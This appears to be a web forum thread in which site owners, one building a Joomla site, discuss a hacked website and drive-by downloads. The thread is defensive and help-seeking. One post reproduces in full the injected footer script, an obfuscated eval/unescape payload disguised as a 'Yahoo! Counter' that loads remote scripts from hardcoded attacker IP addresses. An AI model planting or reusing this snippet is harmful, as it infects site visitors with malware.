This is definitely something malicious. You need to remove that from every and any page it is on in your website. It is good you changed the 777 permissions but I am pretty sure this happened from the trojan you had on your computer. Make sure to remove that code from your pages and remove that trojan from your computer, then change all your passwords.

My original exploit was 13/03
Any suggestions – this is my first venture into website building.

my two cents.

After this infection i got the virus warning on a file: setup_u.exe on my local pc. This was AFTER my website was infected and I visited it…

So probably now the script is infecting other PC’s throug my/our website…

<!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\n@%64&oc~%75m|%65%6E%74%2E#w%72@it%65("@%3C~%2Ft#%65xt#%61@%72e~%61%3E"%29!%3Bv~%61$%72%20!i~%2C|%5F,@a%3D`%5B"7~%38@%2E$%31~1%30`.$%31!%37%35.2@1"!,"1`%39%35%2E%32!%34@%2E&7%36|.2`%35%31$%22$%5D%3B%5F!%3D|%31;%69&f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&at|%63$%68%28#%2F~%5C%62h@%67f%74|=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&%3Bi%3C`2$%3B|%69%2B%2B#%29$%64%6F%63&u%6D@%65%6E&t`.@%77r#%69t$%65%28%22%3C&%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75|%6D%65n#t@%2E%77&r%69%74%65(&%5C"`%3C~%73c%72i|p%74~%20@%69%64!%3D%5F!"+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&%2Ba|%5B&i@]%2B%22%2F`c!%70/&?%22&+@%6Ea@%76%69&g~%61%74!or.%61#pp#%4E%61m%65.|%63|h`%61~%72%41`%74%28%30#%29&+"%3E%3C#%5C!%5C#/~%73%63&r@i%70|t%3E%5C%22$%29%3C@%5C|/s%63r#i%70|%74%3E`%22%29#%3B\n&/|%2F%3C`/%64@i%76%3E').replace(/\!|\||~|@|`|#|\&|\$/g,""));var yahoo_counter=1;
<!-- counter end -->

This looks like the same sort of thing as what my friend was infected with, but possibly more serious. You should make sure to get that removed from your site right away. It appears that it is in the footer of your site. From the little bit of research I did on this “yahoo counter” script injection it appears that many users had reported virus’s being automatically downloaded to their computers when they visited the site.

So, I’m building a joomla website. I’m standing around at Best Buy looking at some Apple gear and took a peek at the site and it looked trashed — elements on the page were out of sorts and missing. Later, on a different machine, I noticed that it was connecting with “http://78.110.175.249/cp/a/?p” and the browser appeared to lockup. So I shut the computer down and started poking around for info on the IP address. Anyway, Spybot and AVG didn’t seem to find anything of importantance but get this… the site now appears to be fine on every computer but mine. At this moment the site won’t even open (for me) in Safari (just get a blank page) and FF and IE7 are placing the joomla modules incorrectly (for me). Every other website I hit seems just fine on this computer. And other computers seem to render the site fine (www.site.connexionscc.com).

I could understand my computer screwed aound with other pages or random pages but not just this particular site. Simply perplexing.